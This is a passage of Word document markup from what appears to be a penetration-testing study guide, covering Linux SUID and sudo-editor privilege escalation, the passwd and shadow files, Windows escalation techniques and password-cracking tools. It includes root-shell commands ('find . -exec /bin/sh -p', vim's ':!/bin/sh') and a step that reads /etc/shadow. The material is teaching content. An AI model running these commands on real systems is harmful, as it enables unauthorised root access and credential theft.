          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For an SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary, run: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find . -exec /bin/sh -p \; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — because </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can spawn other programs, the spawned shell inherits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">'s root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm success with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the output should show </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With root, read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to confirm full post-exploitation capability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">□ Illustrative Output (not an actual captured run)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$ find / -perm -4000 -type f 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/bin/find</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/usr/bin/passwd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/bin/su</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$ find . -exec /bin/sh -p \;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd vs /etc/shadow</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1949"/>
        <w:gridCol w:w="3898"/>
        <w:gridCol w:w="3899"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3899"/>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/etc/shadow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Readable by</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Any user (world-readable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="389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Root only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Contains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Username, UID/GID, home directory, shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3899"/>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Password hashes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, password ageing information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="194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Security relevance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3898"/>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Lists accounts — useful for enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="389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Compromise means every local password hash is exposed to offline cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Why reading /etc/shadow after root is significant (observation question)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Because /etc/shadow is readable only by root, successfully reading it is direct proof that full root privilege escalation succeeded. It also hands the attacker every local account's password hash, which can then be cracked offline (Section 3.7) — potentially recovering plaintext passwords that are reused on other systems or services, turning one compromised machine into a foothold across the whole environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:left w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:bottom w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:right w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FBEAEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A33A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✗ Common Mistake</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Giving a regular user sudo rights to a text editor like </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">vim</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (observation question): this is a critical misconfiguration because nearly every full-screen editor has a documented GTFOBins escape — for example </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">vim</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">'s </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">:!/bin/sh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> command spawns a shell with the editor's privileges. If the editor can be run as root via sudo, that shell is a root shell. The mistake is assuming an editor is “just for editing files” and therefore harmless to grant as a sudo privilege.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 Windows Privilege Escalation Concepts</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2242"/>
        <w:gridCol w:w="7504"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7504"/>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How It Works</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Unquoted service paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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If a Windows service's executable path contains spaces and is not wrapped in quotes, Windows tries several shorter paths in sequence before the real one. Placing a malicious executable at one of those earlier paths can make Windows run it with the service's (often SYSTEM) privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Weak registry permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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If a low-privilege user can modify the registry key defining how a privileged service starts, they can point it at their own malicious program</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Token impersonation (`getsystem`)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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Meterpreter's </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">getsystem</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> command tries several known Windows token-impersonation techniques to escalate an administrator-level session to full SYSTEM privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.7 Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Identifying hash types</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Different hashing algorithms (MD5, SHA-1, NTLM, bcrypt) produce hashes of different lengths and formats. Correctly identifying the hash type is the first step, because cracking tools need to know which algorithm to attempt.</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1949"/>
        <w:gridCol w:w="7797"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Primary Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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John the Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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 dictionary attack against a hash file — tries every word in a wordlist like </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">rockyou.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> against the given hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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 GPU-accelerated cracker that supports many hash types (selected with a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">mode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> number) and is much faster than CPU-based cracking for large wordlists</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1949"/>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Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7797"/>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Online brute-force against live login services — such as SSH or an HTTP login form — by trying many username/password combinations directly against the service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="888888" w:sz="6"/>
          <w:left w:val="single" w:color="888888" w:sz="6"/>
          <w:bottom w:val="single" w:color="888888" w:sz="6"/>
          <w:right w:val="single" w:color="888888" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F5F5F0" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
